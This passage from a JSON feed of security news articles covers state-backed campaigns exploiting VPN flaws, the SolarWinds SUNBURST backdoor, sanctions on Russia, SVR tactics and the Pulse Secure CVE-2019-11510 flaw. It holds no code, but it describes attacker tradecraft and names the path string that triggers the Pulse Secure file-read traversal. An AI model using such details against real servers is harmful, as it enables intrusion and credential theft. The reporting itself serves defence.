([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:41", "description": "[](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. \"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:30", "description": "[](<https://thehackernews.com/images/-_SvUUuvh0ss/XpmKGXtsseI/AAAAAAAAAPI/SuMNxubahJUd3z_eE6vcjjgsuPoYjkdawCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-2.jpg>)\n\nThe United States Cybersecurity and Infrastructure Security Agency (CISA) yesterday issued a [fresh advisory](<https://www.us-cert.gov/ncas/alerts/aa20-107a>) alerting organizations to change all their Active Directory credentials as a defense against cyberattacks trying to leverage a known remote code execution (RCE) vulnerability in Pulse Secure VPN servers\u2014even if they have already patched it. \n \nThe warning comes three months after another [CISA alert](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) urging users and administrators to [patch Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>) environments to thwart attacks exploiting the vulnerability. \n \n\"Threat actors who successfully exploited CVE-2019-11510 and stole a victim organization's credentials will still be able to access \u2014 and move laterally through \u2014 that organization's network after the organization has patched this vulnerability if the organization did not change those stolen credentials,\" CISA said. \n \nCISA has also [released a tool to help](<https://github.com/cisagov/check-your-pulse>) network administrators look for any indicators of compromise associated with the flaw. \n \n\n\n## A Remote Code Execution Flaw\n\n \nTracked as [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), the pre-authentication arbitrary file read vulnerability could allow remote unauthenticated attackers to compromise vulnerable VPN servers and gain access to all active users and their plain-text credentials, and execute arbitrary commands. \n \n\n\n[](<https://thehackernews.com/images/-9lA8I2RLHGU/XpmBkUgmolI/AAAAAAAA2qg/xhY8D8d5TDs7mVoKQo3kFZmB8fmEu1yvwCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability.jpg>)\n\n \nThe flaw stems from the fact that [directory traversal](<https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/>) is hard-coded to be allowed if a path contains \"dana/html5/acc,\" thus allowing an attacker to send specially crafted URLs to read sensitive files, such as \"/etc/passwd\" that contains information about each user on the system. \n \nTo address this issue, Pulse Secure released an [out-of-band patch](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) on April 24, 2019. \n \n[](<https://thehackernews.com/images/-JoiStCZj61c/XpmChlfPXpI/AAAAAAAAAO8/x_r1K3sIkukYxwR0UcxXPcNLaxvuDvrmQCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-1.jpg>) \n \nWhile on August 24, 2019, security intelligence firm Bad Packets was able to discover [14,528 unpatched](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) Pulse Secure servers, a subsequent scan as of last month yielded [2,099 vulnerable endpoints](<https://twitter.com/bad_packets/status/1242289478334427139>), indicating that a vast majority of organizations have patched their VPN gateways. \n \n\n\n## Unpatched VPN Servers Become Lucrative Target\n\n \nThe fact that there are still over thousands of unpatched Pulse Secure VPN servers has made them a lucrative target for bad actors to distribute malware. \n \nA report from ClearSky found Iranian state-sponsored [hackers using CVE-2019-11510](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>), among others, to penetrate and steal information from target IT and telecommunication companies across the world. \n \nAccording to an [NSA advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) from October 2019, the \"exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code.\" \n \nIn a similar alert issued last year, the UK's National Cyber Security Centre ([NCSC](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)) warned that advanced threat groups are exploiting the vulnerability to target government, military, academic, business, and healthcare organizations. \n \nMore recently, [Travelex](<https://www.bbc.com/news/business-51017852>), the foreign currency exchange and travel insurance firm, became a victim after cybercriminals planted Sodinokibi (REvil) [ransomware](<https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9>) on the company's networks via the Pulse Secure vulnerability. Although the ransomware operators demanded a ransom of $6 million (\u00a34.6 million), a [Wall Street Journal](<https://www.wsj.com/articles/travelex-paid-hackers-multimillion-dollar-ransom-before-hitting-new-obstacles-11586440800>) report last week said it paid $2.3 million in the form of 285 Bitcoin to resolve its problem. \n \nIn the face of ongoing attacks, it's recommended that organizations upgrade their Pulse Secure VPN, reset their credentials, and scan for unauthenticated log requests and exploit attempts. \n \nCISA has also suggested removing any unapproved remote access programs and inspecting scheduled tasks for scripts or executables that may allow an attacker to connect to an environment. \n \nFor more steps to mitigate the flaw, head to [NSA's advisory here](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 